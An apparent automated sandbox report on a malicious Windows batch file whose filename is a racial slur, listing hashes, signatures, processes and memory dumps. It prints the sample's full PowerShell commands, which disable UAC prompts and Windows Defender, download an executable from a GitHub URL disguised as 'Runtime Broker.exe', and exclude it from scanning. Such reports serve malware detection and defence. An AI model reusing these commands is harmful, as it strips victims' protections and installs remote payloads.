Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    23/03/2025, 22:49

General

  • Target
    nigga2.bat
  • Size
    1KB
  • MD5
    06aafbdb0650ecee01c1bdb6b7b51fdb
  • SHA1
    ad8c1f0ca620d813ce8e3280139817db583f9c4e
  • SHA256
    3b5953d3ea0420345b5c1e9efdbb88ea80bcaa99f2582834c2cd545efa84880c
  • SHA512
    039a8ca7db486f7c473a07c22c4269c211fc44175d3fb480eeaf5435df23a70151927940b0bf6a7bbc29b12b1d9a84ab5240686e05cc9daae0d54920d2d84fb9

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\nigga2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-ExecutionPolicy Unrestricted -Force; Set-ItemProperty -Path 'REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'ConsentPromptBehaviorAdmin' -Value 0; Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference -SubmitSamplesConsent 2; Set-Service -Name WinDefend -StartupType Disabled; Stop-Service -Name WinDefend;"
      2⤵
      • UAC bypass
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/pizq3/dfsdfdfs/releases/download/sex/File.1.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2432
    • C:\Windows\system32\timeout.exe
      timeout /t 2
      2⤵
      • Delays execution with timeout.exe
      PID:2776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2944

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CI2LMJIM5N34PY1P45UB.temp
    Filesize: 7KB
    MD5: 1de9dfc2c02b7f3028b9ac732d39518b
    SHA1: 055c6575d90d461bdd64057b3fe580b2e8fb526b
    SHA256: 1180d61286fca322d606c8434d9c06591a7ff355ea1ab4c6657a519c46e46e6a
    SHA512: 6f629cbe470fcd0b9904f607a905d784ee1cab7707b5f709211be9073e3410e65ddddeddd8f0bfcd76db0ca6bd08f8fd5392f8b7102d2480464bd2cb74081ed2
  • memory/2092-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
    Filesize: 9.6MB
  • memory/2092-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
    Filesize: 9.6MB
  • memory/2092-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
    Filesize: 9.6MB
  • memory/2092-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
    Filesize: 9.6MB
  • memory/2092-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
    Filesize: 9.6MB
  • memory/2092-7-0x0000000001E80000-0x0000000001E88000-memory.dmp
    Filesize: 32KB
  • memory/2092-6-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
    Filesize: 9.6MB
  • memory/2092-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
    Filesize: 2.9MB
  • memory/2092-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp
    Filesize: 4KB
  • memory/2432-18-0x000000001B4A0000-0x000000001B782000-memory.dmp
    Filesize: 2.9MB
  • memory/2432-19-0x0000000001E80000-0x0000000001E88000-memory.dmp
    Filesize: 32KB
  • memory/2944-25-0x0000000140000000-0x00000001405E8000-memory.dmp
    Filesize: 5.9MB
  • memory/2944-26-0x0000000140000000-0x00000001405E8000-memory.dmp
    Filesize: 5.9MB